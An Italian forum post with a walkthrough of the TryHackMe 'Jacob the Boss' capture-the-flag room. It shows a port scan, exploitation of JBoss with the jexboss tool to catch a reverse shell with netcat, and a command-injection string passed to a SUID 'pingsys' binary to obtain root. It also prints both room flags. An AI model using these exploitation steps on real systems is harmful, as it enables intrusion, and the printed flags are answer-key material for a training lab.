Descrizione:
Well, the flaw that makes up this box is the reproduction found in the production environment of a customer a while ago, the verification in season consisted of two steps, the last one within the environment, we hit it head-on and more than 15 machines were vulnerable that together with the development team we were able to correct and adapt.
*First of all, add the jacobtheboss.box address to your hosts file.
Anyway, learn a little more, have fun!

Link: https://tryhackme.com/room/jacobtheboss

USER FLAG:

Proviamo a fare una scansione con Nmap, notiamo subito che il server non ha firewall ed è molto vulnerabile, dato interessante per inviare qualche exploit o cose simili:

22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:ca:13:6e:d9:63:c0:5f:4a:23:a5:a5:a5:10:3c:7f (RSA)
|   256 a4:6e:d2:5d:0d:36:2e:73:2f:1d:52:9c:e5:8a:7b:04 (ECDSA)
|_  256 6f:54:a6:5e:ba:5b:ad:cc:87:ee:d3:a8:d5:e0:aa:2a (ED25519)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20
|_http-title: My first blog
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
1090/tcp open  java-rmi    Java RMI
|_rmi-dumpregistry: ERROR: Script execution failed (use -d to debug)
1098/tcp open  java-rmi    Java RMI
1099/tcp open  java-object Java Object Serialization
| fingerprint-strings: 
|   NULL: 
|     java.rmi.MarshalledObject|
|     hash[
|     locBytest
|     objBytesq
|     http://jacobtheboss.box:8083/q
|     org.jnp.server.NamingServer_Stub
|     java.rmi.server.RemoteStub
|     java.rmi.server.RemoteObject
|     xpw;
|     UnicastRef2
|_    jacobtheboss.box
3306/tcp open  mysql       MariaDB (unauthorized)
4444/tcp open  java-rmi    Java RMI
4445/tcp open  java-object Java Object Serialization
4446/tcp open  java-object Java Object Serialization
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|   Potentially risky methods: PUT DELETE TRACE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss™
8083/tcp open  http        JBoss service httpd
|_http-title: Site doesn't have a title (text/html).

Possiamo notare che nella porta 80 è in esecuzione il server JBOSS con tanto di versione 5.0, facendo una rapida ricerca online notiamo che quella versione ha diverse vulnerabilità che si possono sfruttare, proviamo a scaricarlo.

parrot@parrot:/data/Jacob_the_Boss/files/jexboss$ python jexboss.py -u http://jacobtheboss.box:8080/
 * --- JexBoss: Jboss verify and EXploitation Tool  --- *
 |  * And others Java Deserialization Vulnerabilities * | 
 |                                                      |
 | @author:  João Filho Matos Figueiredo                |
 | @contact: joaomatosf@gmail.com                       |
 |                                                      |
 | @update: https://github.com/joaomatosf/jexboss       |
 #______________________________________________________#

 @version: 1.2.4

 * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **


 ** Checking Host: http://jacobtheboss.box:8080/ **

 [*] Checking admin-console:                  [ OK ]
 [*] Checking Struts2:                        [ OK ]
 [*] Checking Servlet Deserialization:        [ OK ]
 [*] Checking Application Deserialization:    [ OK ]
 [*] Checking Jenkins:                        [ OK ]
 [*] Checking web-console:                    [ VULNERABLE ]
 [*] Checking jmx-console:                    [ VULNERABLE ]
 [*] Checking JMXInvokerServlet:              [ VULNERABLE ]


 * Do you want to try to run an automated exploitation via "web-console" ?
   If successful, this operation will provide a simple command shell to execute 
   commands on the server..
   Continue only if you have permission!
   yes/NO? yes

 * Sending exploit code to http://jacobtheboss.box:8080/. Please wait...

Ora possiamo mettere una specie di sniffer alla porta 4444 per poi fornire al servizio l'IP privato e pubblico LHOST e LPORT.

parrot@user:/data/vpn$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.156.161] 43552
bash: no job control in this shell
[jacob@jacobtheboss /]$ id
id
uid=1001(jacob) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0

Per la flag basterà aprire il file .txt.

USER FLAG: f4d491f280de360cc49e26ca1587cbcc

ROOT FLAG:

Procediamo analizzando gli script dell'installazione di DotClear! L'accesso alla configurazione (root) è SENZA PASSWORD quindi non serve neanche fare un attacco brute force o analoghi, il problema avviene quando bisogna decifrare l'hash quindi tentiamo di enumerare ma con scarsi risultati.

Per fortuna c'è esiste un programma insolito di proprietà di root con il bit SUID impostato:

[jacob@jacobtheboss mail]$ find / -type f -user root -perm -u=s 2>/dev/null
find / -type f -user root -perm -u=s 2>/dev/null
/usr/bin/pingsys  <------------- interesting!
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/chage
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper

Il programma è vulnerabile e possiamo inserire dei comandi per avere la root shell:

[jacob@jacobtheboss mail]$ /usr/bin/pingsys "10.8.50.72;/bin/bash"
/usr/bin/pingsys "10.8.50.72;/bin/bash"
PING 10.8.50.72 (10.8.50.72) 56(84) bytes of data.
64 bytes from 10.8.50.72: icmp_seq=1 ttl=63 time=46.2 ms
64 bytes from 10.8.50.72: icmp_seq=2 ttl=63 time=61.8 ms
64 bytes from 10.8.50.72: icmp_seq=3 ttl=63 time=294 ms
64 bytes from 10.8.50.72: icmp_seq=4 ttl=63 time=271 ms

--- 10.8.50.72 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 46.259/168.534/294.567/114.923 ms
[root@jacobtheboss mail]# id
id
uid=0(root) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0

Come prima la flag si trova nel file root.txt:
ROOT FLAG: 29a5641eaa0c01abe5749608c8232806

Riassumendo:

Questa room è abbastanza incasinata quindi la consiglio a persone che hanno già esperienza o almeno di livello intermedio!😁

    Samueleex Questa room è abbastanza incasinata quindi la consiglio a persone che hanno già esperienza o almeno di livello intermedio!😁

    ok, buono a sapersi! Spenderò in altro modo il mio tempo ahah, almeno per ora! :)

      Powered by: FreeFlarum.
      (remove this footer)